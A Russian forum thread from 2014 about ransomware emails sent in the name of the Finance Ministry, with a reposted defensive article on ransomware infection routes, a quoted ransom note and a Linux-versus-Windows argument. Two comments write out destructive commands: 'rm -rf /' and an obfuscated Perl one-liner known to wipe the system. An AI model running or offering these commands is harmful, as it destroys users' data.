Вход на сайт

МЕДИАМЕТРИКА

Облако тегов

Ахтунг! Вирус-шифровальщик!

Аватар пользователя SergeyVBNM

МОСКВА, 17 июн — РИА Новости. Минфин России предупредил коллег из всех правительственных органов о вредоносном коде, который хакеры рассылают от имени замминистра финансов, пишет во вторник газета "Известия".

"Минфин России обратился во все правительственные органы с предостережением: от имени ведомства хакеры стали рассылать спам с вредоносным кодом. Соответствующее письмо <…> за подписью замминистра финансов Татьяны Нестеренко было разослано во все федеральные органы государственной власти, администрации субъектов РФ, а также Центробанк России", — сообщила газета со ссылкой на письмо замминистра финансов.

Издание пояснило, что электронные сообщения рассылаются с несуществующих электронных адресов ведомства и "подписаны" замминистра финансов Андреем Ивановым. "Действительно, от моего имени идет вредоносная рассылка — по госорганам, в регионы, по различным компаниям <…> я уже обратился в полицию и ФСБ, чтобы эти рассылки прекратились", — цитирует газета слова Иванова.

В сообщениях предлагается ознакомиться с приказом Минфина, а затем подписать специальное соглашение, форма которого прикреплена к письму, уточняет издание. В приложении вместо документа прикреплен файл с вредоносным кодом. Кроме государственных органов, подобные письма с вирусами получили и некоторые СМИ.

Вирус "шифрует все текстовые и графические файлы на компьютере и для разблокировки просит переслать от 500 до 5 тысяч рублей на электронный кошелек злоумышленников".

В МВД изданию подтвердили, что получали предостережение от Минфина. Однако пока о возбужденных уголовных делах не известно



РИА Новости http://ria.ru/incidents/20140617/1012294555.html#ixzz35Zs6rkxA

-----------------------------------

Админы рассылают юзерам письма с предостережением и рекомендацией пользовать линукс, типа он надёжнее. Ещё пишут что вирус шифрует вордовские, экселевские файлы, файлы 1С и картинки (интересно почему)

Фонд поддержки авторов AfterShock

Комментарии

Аватар пользователя Tikovka
Tikovka(5 лет 4 месяца)(21:20:40 / 24-06-2014)

uname
FreeBSD

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(21:24:23 / 24-06-2014)

uname

Linux

Аватар пользователя невежда
невежда(5 лет 5 месяцев)(21:20:47 / 24-06-2014)

Дык давно на линукс надо переходить. Более современная система, более качественный подход и нормальные графические интерфейсы, на выбор. Причем графическая среда никак не связана с рабочим ПО. Переход на линукс это шаг к отечественному ПК.

Комментарий администрации:  
*** Почти любой вопрос могу свести к антисобянинской политоте ***
Аватар пользователя Temp
Temp(5 лет 3 недели)(21:32:50 / 24-06-2014)

>Переход на линукс это шаг к отечественному ПК.

Аватар пользователя невежда
невежда(5 лет 5 месяцев)(22:22:50 / 24-06-2014)

По существу есть что сказать ?

Комментарий администрации:  
*** Почти любой вопрос могу свести к антисобянинской политоте ***
Аватар пользователя Temp
Temp(5 лет 3 недели)(22:58:36 / 24-06-2014)

По существу, я не вижу связи между забугорной чуть менее чем полностью ОС и отечественным ПК.

Аватар пользователя невежда
невежда(5 лет 5 месяцев)(23:39:08 / 24-06-2014)

Во первых не забугорной, а создаваемой всем миром, если на то пошло. Во вторых, совместимость и окружение здесь просто подарок. Не даром подобные системы работают на куче архитектур, а перенос ПО не такое сложное дело. Можно легко уйти от гегемонии, собрав все на своей арм-подобной архитектуре.

Комментарий администрации:  
*** Почти любой вопрос могу свести к антисобянинской политоте ***
Аватар пользователя Temp
Temp(5 лет 3 недели)(23:56:23 / 24-06-2014)

>Во первых не забугорной, а создаваемой всем миром, если на то пошло.

А весь мир - не забугорный? :)

>Во вторых, совместимость и окружение здесь просто подарок. 

Совместимость - подарок? :) И что с чем совмещать будем, если инфраструктура меняется раз в 2 года? :) 

>Почитайте даты этих коментариев.

И что, даты? Перл с тех пор новый стал? Bash изменился? 

>все это не сравнить с косяками отМС, которые еще и не фиксятся.

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957

Вот вам пример открытого бага, которому почти 20 лет.

>глупость сделаете ровно в пределах своей песочницы

Угу, под названием /home/user :) То есть, как раз потеряю свои данные, если что :)

Аватар пользователя ExMuser
ExMuser(4 года 6 месяцев)(21:23:02 / 24-06-2014)

uname

Linux

Аватар пользователя Офисный планктон

"Ахтунг! Вирус-шифровальщик!"

Ещё один.

Аватар пользователя SergeyVBNM
SergeyVBNM(5 лет 5 месяцев)(21:26:06 / 24-06-2014)

Уже было?

Комментарий администрации:  
*** В бюджете нет денег, приватизация даст немного денег за хорошие активы ***
Аватар пользователя Офисный планктон

Подобный вирус - был (и, похоже, не один). Такая новость - нет.

Аватар пользователя SergeyVBNM
SergeyVBNM(5 лет 5 месяцев)(21:38:52 / 24-06-2014)

Речь пойдет о так называемых вирусах вымогателях-шифровальщиках, заражение которым участились в последнее время. Такие вирусы могут иметь разные названия,но принцип действия у них один. При попадании на компьютер данный вирус шифрует все файлы (Microsoft Word “doc”, Microsoft Excel “xls”, картинки и фотографии “jpg, jpeg, png, gif”, файлы базы данных 1С Бухгалтерии, видео файлы “avi, mkv, mov”, аудио файлы “mp3, wav”).

Причем, за последние несколько лет эти вирусы изменили подход к своим жертвам. Если раньше они распространялись по классическим схемам через варезы, порно сайты, подмену выдачи и массовые спам-рассылки, при этом заражая компьютеры рядовых пользователей, то сейчас рассылка писем идет адресно, вручную, с почтовых ящиков на «нормальных» доменах — mail.ru, gmail и т.д. А заражать пытаются юридических лиц, причем обычно атака направлена на ПК пользователей, «слабо» представляющих что такое «компьютерный вирус» - бухгалтеров, юристов, секретарей, отдела кадров и тд.), где под шифры попадают базы данных и договора.

Т.е. атаки из количества переросли в качество. В одной из фирм автору довелось столкнуться с шифровальщиком .hardended который пришел в почте с резюме. Заражение произошло сразу же после открытия файла кадровиками, фирма как раз подыскивала персонал и никаких подозрений файл не вызвал. Это был docx с вложенным в него AdobeReader.exe.

Антивирусы в данном случае не помогут. Многие популярные антивирусные программы, к сожалению, пропускают данный вирус, как свидетельствуют посетители форумов: http://forum.kaspersky.com/index.php?showtopic=232546

Проблема в том, что когда Ваш компьютер уже будет заражен, тогда только антивирус может отреагировать, а может отреагировать и через 1 или 3 дня. Но это уже не поможет. Почему так происходит? Все просто. Те, кто создают данный тип вируса и его модификации, меняют его, а антивирусным программам необходимо время, чтобы начать распознавать новый тип вируса. И то, они это делают после того, когда уже кто-то заразился и отослал им «тело» вируса для анализа. А отославшему «тело» вируса уже ничего не остается, кроме, как отложить зараженный винчестер в ящик и ждать, когда ключ RSA1024 взломают (а это может случиться через эн...ное количество лет) или найдут уязвимость в нем. Второй вариант: отформатировать винчестер и установить новую систему. А данные ведь потеряны!

 «Оповещен - значит вооружен!»

Вирус-шифровальщик проникает на компьютер 3-мя способами:

1 - Через вложение к письму.
В письме он может иметь вид: «акт.doc.....................exe» или «Благодарственное письмо.hta». Это специально сформированный файл с вирусом, он также может быть с расширением PDF. Вы видите только акт.doc, а остальная часть Вам не видна и Вы думаете это файл Microsoft Word. Дважды нажав, Вы запускаете программу Акт.doc.....................exe, которая начинает шифровать файлы на Вашем компьютере.

2 - Через файл взломанной программы.
Вы решили скачать программу, за которую не желаете платить деньги, и поэтому в поисковике набрали типа: «программа версия 2.0 взломанная версия скачать». Поисковик выдает Вам целую кучу ссылок, Вы нажимаете на них и в конце концов видите картинку, в которой Вы узнаете нужную вам программу. Вы нажимаете кнопку на сайте «скачать». После того, когда файл закачается на Ваш компьютер, Вы нажимаете на данный файл и ожидаете начала установки данной программы.
Все. Вирус запущен. Началось шифрование Ваших файлов.

3 - Через самораспаковывающийся архив.
Возможно проникновение как через вложение к письму, так и путем скачивания каких- либо неизвестных программ или утилит с непроверенных сайтов.

При попадании на компьютер данный вирус шифрует все файлы.

После того, когда все файлы упакованы, вирус может выдать окно с текстом типа:

«Все файлы на Вашем компьютере зашифрованы, желаете их расшифровать — пишите письмо по адресу ..... и мы вышлем Вам дальнейшие инструкции» или

«Заплатите 150USD на кошелек 2334344454 и перешлите нам на адрес ..... код и время транзакции. После этого мы вышлем Вам программу, которая распакует Ваши файлы».

Или в корне диска C Вы обнаружите файл КАК_РАСШИФРОВАТЬ_ФАЙЛЫ.txt. Внутри данного файла будет текст (приведён реальный пример):

"Если Вы читаете это сообщение, значит Ваш компьютер был атакован опаснейшим вирусом.
Вся ваша информация (документы, базы данных, бэкапы и другие файлы) на этом компьютере была зашифрована с помощью самого криптостойкого алгоритма в мире RSA1024. Восстановить файлы можно только зная уникальный для вашего пк пароль и дешифратор.
Подобрать его невозможно. Смена ОС ничего не изменит. Ни один системный администратор в мире не решит эту проблему не зная кода.
Не в коем случае не изменяйте файлы, иначе разблокировать их даже нам будет не под силу.
Напишите нам письмо на адрес ..... чтобы узнать как получить дешифратор и пароль.
Среднее время ответа специалиста 2-10 часов.

К письму прикрепите файл "КАК_РАСШИФРОВАТЬ_ФАЙЛЫ.txt, который находится в папке C:\КАК_РАСШИФРОВАТЬ_ФАЙЛЫ.txt". Не изменяйте это файл, иначе расшифровать ваши файлы мы не сможем!

Если Вы хотите убедится в том, что мы действительно можем расшифровать ваши файлы в сообщение также можете прикрепить документ с известным вам содержанием и мы его расшифруем.

Письма с угрозами будут угрожать только Вам и Вашим файлам!
НЕ ЗАБУДЬТЕ: только МЫ можем расшифровать Ваши файлы!"

И вся проблема в том, что если даже пойти на переговоры с вымогателями, то нет никакой уверенности, что они  пришлют программу-расшифровщик.

Алгоритм шифрования (RSA1024) — RSA 1024 бит, который применяет данный вирус, не взламывается! Точнее, его можно взломать, но для этого надо будет взять в аренду все суперкомпьютеры, которые есть в мире (и неизвестно, сколько десятилетий или столетий они будут пытаться взломать данный ключ). Похоже на фантастику. Но математика такова: чтобы взломать RSA длинной 768 бит, т.е. подобрать ключ методом перебора (так называемый brute force), необходимо иметь 1 000 000 USD и 1 год вычислений. В 2008 году кто-то заявлял, что ключ взломан, но до сих пор (2013 год) никто не предоставил доказательства взлома ключа.

Кто желает ознакомиться с тем, возможно ли с помощью полного перебора всех варианов взломать данный алгоритм, советую почитать данную статью: http://cybervlad.net/faq-cle/

С сайта http://virusinfo.info/showthread.php?t=24090:

"Лаборатория Касперского" ранее уже сталкивалась с другими версиями вируса Gpcode (см. статью «Шантажист» http://www.viruslist.com/ru/analysis?pubid=188790045), и экспертам компании во всех случаях удавалось получить секретный ключ путем детального криптографического анализа имеющихся данных.

До сих пор максимальная длина ключа RSA, который удалось «взломать» специалистам «Лаборатория Касперского», составляла 660 байт. На подбор ключа такой длины при помощи машинного перебора требуется около 30 лет работы одного ПК с частотой процессора 2,2Ghz.

После этого инцидента автор Gpcode выждал почти 2 года, прежде чем создать новую, усовершенствованную версию своего вируса, лишенную старых ошибок и использующую еще более длинный ключ.
На данный момент расшифровать пострадавшие файлы не удалось, поскольку новый вирус использует ключ длиной 1024 бит.

Расшифровать зашифрованное вирусом Virus.Win32.Gpcode.ak сообщение можно, лишь располагая секретным ключом, которым в настоящее время, вероятно, обладает только автор данного вируса."

То есть, реальных шансов взломать данный ключ пока нет.

Так что же делать?

Возможные варианты  действий по защите от данного вируса:

Во-первых, дублировать важную информацию на внешние носители.

Во-вторых, хранить все важные вам файлы в «облачных хранилищах».

В-третьих, не открывайте почтовые вложения от неизвестных отправителей:

В большинстве случаев программы-шифровальщики распространяются через почтовые вложения. Задача злоумышленника – убедить пользователя открыть вложение из письма, поэтому темы писем содержат угрозы: уведомление от арбитражного суда об иске; исполнительное производство о взыскании задолженности; возбуждение уголовного дела и тому подобное. 

При этом вредоносными могут оказаться не только файлы формата EXE. Специалистами Лаборатории Касперского зафиксированы случаи заражения компьютеров при открытии специально сформированных злоумышленниками файлов форматов DOC и PDF.

В-четвертых, есть предположение, что некоторые из модификаций данного вируса используют встроенную в систему Windows службу Encrypting File System (EFS) - система шифрования данных, реализующая шифрование на уровне файлов в операционках Windows, начиная с Windows 2000 (подробнее: http://ru.wikipedia.org/wiki/Шифрованная_файловая_система). Имеет смысл попробовать отключить данную службу, может это остановит хотя бы некоторые из модификаций данного вируса.

В-пятых, устанавливать Linux. Почему Linux? Потому, что вирусы на Linux очень редкое явление, которое скорее является исключением. Linux намного более защищена, чем другие операционные системы. И данный тип вируса (который рассматривается в данной рассылке) не распространяется на Linux.

Комментарий администрации:  
*** В бюджете нет денег, приватизация даст немного денег за хорошие активы ***
Аватар пользователя Temp
Temp(5 лет 3 недели)(21:54:55 / 24-06-2014)

>Linux намного более защищена, чем другие операционные системы. 

Ну-ну.

http://www.linux.org.ru/forum/development/392747

До сих пор настроение поднимает.

Аватар пользователя невежда
невежда(5 лет 5 месяцев)(22:25:06 / 24-06-2014)

И что тут такого смешного? Поясните.

Комментарий администрации:  
*** Почти любой вопрос могу свести к антисобянинской политоте ***
Аватар пользователя Temp
Temp(5 лет 3 недели)(22:53:35 / 24-06-2014)

Комментариии почитайте. Хотя бы первую страницу.

Аватар пользователя невежда
невежда(5 лет 5 месяцев)(23:41:09 / 24-06-2014)

Почитайте даты этих коментариев. И здесь правильно написали, глупость сделаете ровно в пределах своей песочницы. В 11м классе я написал несколько троянов, которые завешивали наглухо Windows NT, считавшийся тогда современным решением от микрософт.

Комментарий администрации:  
*** Почти любой вопрос могу свести к антисобянинской политоте ***
Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(23:22:50 / 24-06-2014)

Linux не гарантирует защиту от вашей личной дурости, увы. А от вирусов - защищает.

У меня на ноуте Linux c 2005 года, 4й ноут меняю уже - ни одного вруса не видел, антивруса не ставил.

Аватар пользователя Temp
Temp(5 лет 3 недели)(23:30:47 / 24-06-2014)

>Linux не гарантирует защиту от вашей личной дурости, увы. А от вирусов - защищает.

Взаимоисключающие параграфы. Широкое распространение вирусов - как раз следствие личной дурости.

>У меня на ноуте Linux c 2005 года, 4й ноут меняю уже - ни одного вруса не видел, антивруса не ставил.

Не LInux, а Gentoo. А под генту понятие "вирус" вообще бессмысленно, ибо они не заражают сырцы.

А пример "трояна" я показал. Там же можно про форк-бомбу почитать.  http://www.linux.org.ru/forum/talks/1398974

Вообще, под Linux на дурость проще всего всё смахнуть, ибо руками нужно много чего делать.

Аватар пользователя невежда
невежда(5 лет 5 месяцев)(23:43:23 / 24-06-2014)

Если уж глубоко вдаваться, то линукс несколько "бардачней" чем BSD, однако опять же 2006й год. Ну и что  ? все это не сравнить с косяками отМС, которые еще и не фиксятся.

Комментарий администрации:  
*** Почти любой вопрос могу свести к антисобянинской политоте ***
Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(11:19:05 / 25-06-2014)

Знаете, с вашей логикой ручной запуск rm -frd от root  - это вирус/троян. :)

Я, вообще-то, полагал, что вирусы/трояны запускаюццо без ведома пользователя. А про "форк-бомбу", снова таки, требующую запуска руками(!), тоже даны вполне сносные рекомендации - ограничивайте число процессов через PAM.

Аватар пользователя Temp
Temp(5 лет 3 недели)(12:15:37 / 25-06-2014)

>Я, вообще-то, полагал, что вирусы/трояны запускаюццо без ведома пользователя.

Да ладно? И как же вирус/троян должен запуститься без ведома пользоателя, позвольте узнать?

>Знаете, с вашей логикой ручной запуск rm -frd от root  - это вирус/троян. :)

Определению трояна соответствует. Не вирус, ибо файлы не заражает.

>ограничивайте число процессов через PAM.

Мистер, вы в своём уме? Предлагаете пользователю с PAM разбираться? А потом, при неправильной его настройке свалить всё на кривые руки юзера? :))

Фанатики такие фанатики...

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(12:25:03 / 25-06-2014)

Гм...

Ручками, да из-под рута, пользователю перловую программу "с целью отладки" (!), значить, запускать можно, а настроить PAM, используя море манов с пошаговыми инструкциями (sic!) - уже низзя.

Странная у вас логика. Знаете, Linux - это такая система, где 99% настроек находиццо в текстовых файлах, ващето. В директории /etc.

Аватар пользователя Temp
Temp(5 лет 3 недели)(12:36:46 / 25-06-2014)

>манов с пошаговыми инструкциями (sic!)

manы с пошаговыми инструкциями в студию. По любой программе. Дико хочу увидеть сиё диво.

Аватар пользователя Офисный планктон

А вот и не подерётесь!

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(12:43:16 / 25-06-2014)

Дык - о чем можно говорить с виндузятником? ;)

Аватар пользователя Temp
Temp(5 лет 3 недели)(12:48:20 / 25-06-2014)

Ну так чего? Ссылок на расчудесные маны с пошаговыми инструкциями не будет?

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(12:55:45 / 25-06-2014)

Неа. Я в "детский сад" не играю. Если ты сам не можешь найти - я помогать не стану.

Впрочим... Настройка Gentoo описана тут и тут. Наслаждайся. ;)

Аватар пользователя Temp
Temp(5 лет 3 недели)(13:05:09 / 25-06-2014)

>Впрочим... Настройка Gentoo описана тут и тут. Наслаждайся. ;)

Мистер-линуксоид, вы handbook от manов отличить способны?

Покажите мне пошаговые инструкции в манах. В любом на выбор. Можно даже просто man "программа", а после - с какого места читать.

А после, пошаговые инструкции по настройке PAM в той доке, что вы привели.  

Вроде бы IT'шник в прошлом, но такую чушь несёте...

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(13:06:57 / 25-06-2014)

Я ожидал этой реплики. :) Сказал же - в детский сад не играю.

А по сути вопроса соображения есть?

Аватар пользователя Temp
Temp(5 лет 3 недели)(13:08:40 / 25-06-2014)

Вы что, неспособны даже на  man "программа" ответить?

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(13:20:14 / 25-06-2014)

Don't change the subject! (Не соскакиваете с темы!)

1. Мы обсуждали вирусы по Linux, которых нет.

2. Вы привели пример скрипта, запускаемого из-под рута руками, назвав его "трояном". Я вам указал на это (запуск руками из-под рута).

3. Вы привели пример ДРУГОГО скрипта, снова таки запускаемого из-под рута руками! Я вам снова на это указал.

Не вижу смысла в дальнейшем разговоре.

Вы посетили ссылки, которые я вам (скрепя сердце) предоставил? Может быть, вам нужна помощь в настойке PAM?

Аватар пользователя Temp
Temp(5 лет 3 недели)(13:38:26 / 25-06-2014)

>Вы привели пример скрипта, запускаемого из-под рута руками, назвав его "трояном". Я вам указал на это (запуск руками из-под рута).

>Вы привели пример ДРУГОГО скрипта, снова таки запускаемого из-под рута руками! Я вам снова на это указал.

Пользователь сам закачивает трояны с левых сайтов и запускает их. Не зная, разумеется, что это трояны.

Я привёл пример простейших вредоносных программ. А дальше, по воле автора такого "трояна", их можно хоть в pre-/postconfigure scripts в пакеты засунуть. Ведь пользователю остро программа, хоть и с левого сайта, нужна. А скрипты пакетов как раз под рутом выполняются, и без ведома пользователя.

В принципе, Perl-скрипт - примитивный, но троян, ибо пользователю не сообщается об его деструктивных фцнкциях. 

Это про "Linux более защищена".

>Вы посетили ссылки, которые я вам (скрепя сердце) предоставил?

Внезапно, да. Пошаговых настроек по PAM там нет. 

Но я интересовался манами, точнее, пошаговыми инструкциями в них, ведь вы от своих слов пока не отказалить, гордо продолжая диалог, не замечая этого.

>Не соскакиваете с темы!

Тема, напомню, - вредоносные программы. Защита от них входит в нашу тему. Защита через настройки руками, пользуясь докой. А я хочу увидеть маны с пошаговыми инструкциями, о которых вы тут говорили, можно и по программам строго по теме.

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(13:40:26 / 25-06-2014)

Простите, но мне не истересно.

Аватар пользователя Temp
Temp(5 лет 3 недели)(13:50:33 / 25-06-2014)

Пожалуйста.

Спасибо, по крайней мере, за "маны с пошаговыми инструкциями". Это гениально, в отличие от "БП 1200 Вт в типичном компьютере" и "640 кб 130 нм хватит всем". 

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(14:00:50 / 25-06-2014)

Да мне честно говоря, пофигу, что лично вы про меня думаете. Я, кажеццо, уже говорил.

Аватар пользователя Temp
Temp(5 лет 3 недели)(14:05:49 / 25-06-2014)

Так я про вас ничего не думаю, мистер. Я вас за гениальную фразу благодарю. Сам бы никогда не додумался до такого невероятно простого, но шедевра. Спасибо, YUKLA.

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(14:07:20 / 25-06-2014)

Нема за що. ;)

Аватар пользователя Rashad_rus
Rashad_rus(5 лет 9 месяцев)(21:25:57 / 24-06-2014)

uname

Linux

Аватар пользователя Bledso
Bledso(4 года 8 месяцев)(21:26:46 / 24-06-2014)

Дебилам и линукс не поможет. Все работы по восстановлению - за счет лоха, который щелкает по ссылкам. Вот это будет эффективно.

Аватар пользователя Temp
Temp(5 лет 3 недели)(21:28:18 / 24-06-2014)

>Вирус "шифрует все текстовые и графические файлы на компьютере и для разблокировки просит переслать от 500 до 5 тысяч рублей на электронный кошелек злоумышленников".

Хороший, годный вирус.

Аватар пользователя Reader
Reader(3 года 6 месяцев)(21:32:13 / 24-06-2014)

В прошлом году проскочил ролик, где одна дама рассказывала для американцев,
если они услышат о некоем банковском вирусе и банки будут закрываться
чтобы вычистить этот вирус из банковской компютерной системы, это
красный флаг: у вас есть только 72 часа до введения комендантского часа

http://youtu.be/_d2J4jHmEL8

YOUR 72 HOUR RED FLAG BEFORE US MARTIAL LAW !!!

Аватар пользователя Информатик

.
Здраствуйте. Я текстовый вирус для Минфина.

Меня написал бедный студент из Зимбабве. К сожалению в небогатой индийской провинции где он живет было очень трудно найти компьютер, поэтому распространятся самостоятельно я не умею. В этом я очень расчитываю на ваше понимание и доброту. Пожалуста, если у вас есть такакя возможнось, будьте снисходительны и продлите мое существование, перепечатав этот текст где-нибудь у себя.

С благодарностью и уважением, ваш Вирус


http://blueeyedcat.diary.ru/p2197522.htm

Аватар пользователя YUKLA
YUKLA(4 года 6 месяцев)(21:46:38 / 24-06-2014)

Вообще-то - это "таджикскй вирус"

Страфиствуйтэ, я таджикский вирюс. Па причина ужасный бедность моей создателя и низкий уровне развитиё технология в наша страна я не способин причинять какая-либа уред Вашей компютеру. Поэтому ощень прашу Уас, пажальста, сами сатрите какая-нибут важная для Уас файлу, а патом разашлиты миня па почьта или аска другой адрисатам. Зарания благадарная за панимании и сатрудничесва.

Аватар пользователя BRICS
BRICS(3 года 5 месяцев)(21:48:06 / 24-06-2014)

uname

virtual surfing
Аватар пользователя vvelichko
vvelichko(5 лет 11 месяцев)(21:52:45 / 24-06-2014)
------------------------- uname Linux ------------------------- Что это было? Кто не скачет - тот маскаль? =)
Аватар пользователя Intel4004
Intel4004(5 лет 3 месяца)(22:00:38 / 24-06-2014)

man uname

Аватар пользователя vvelichko
vvelichko(5 лет 11 месяцев)(06:07:16 / 25-06-2014)

[vvelichko@cisdev ~]$ uname -a

AIX cisdev 1 6 00027D3AD400

Аватар пользователя vvelichko
vvelichko(5 лет 11 месяцев)(06:09:53 / 25-06-2014)

можешь считать, что я тут с вами поскакал, присоеденился так сказать к сообществу =)

Аватар пользователя ExMuser
ExMuser(4 года 6 месяцев)(05:47:39 / 25-06-2014)

rm -rf /

:)

Аватар пользователя vvelichko
vvelichko(5 лет 11 месяцев)(06:12:37 / 25-06-2014)

да нифига подобного, шутка с deltree была куда как эффективнее.

хотя.... лет 10 назад лор взорвал призыв о помощи, не работала перловка:

 perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' 


Аватар пользователя ExMuser
ExMuser(4 года 6 месяцев)(07:08:34 / 25-06-2014)

Ну Вы сравнили, ДОС с Линухом. Та-то вообще никакой защиты не было кроме y/n. Хотя, при наличии желания и кривых рук сломать можно что угодно. :)

Аватар пользователя vvelichko
vvelichko(5 лет 11 месяцев)(09:43:40 / 25-06-2014)

хех, ноды фидошные десятками в астрал уходили :-)

за одно посмотри, http://www.linux.org.ru/forum/development/392747

эт та самая хохма 10-летней давности, автор одной строкой кода вычислил сидящих под рутом.

ЗЫ

глобально чё хотел сказать то, del в досе знали все, а до deltree книжку дочитывали немногие :-)

Аватар пользователя ExMuser
ExMuser(4 года 6 месяцев)(12:52:34 / 25-06-2014)

10 лет назад рут был по дефолту, емнип, и линух был не так распространён и дружественен. Сейчас ещё задолбаешься в рут грузиццо. Я, когда года полтора назад увлёкся убунтой, даже и подумать не мог под su сидеть. Только в хоме! Если надо - sudo -i или sudo su, и вперёд, крушить систему. :)

Аватар пользователя Omni
Omni(5 лет 2 месяца)(22:16:03 / 24-06-2014)

omni@ursa:~$ uname
Linux

Лидеры обсуждений

за 4 часаза суткиза неделю

Лидеры просмотров

за неделюза месяцза год

СМИ

Загрузка...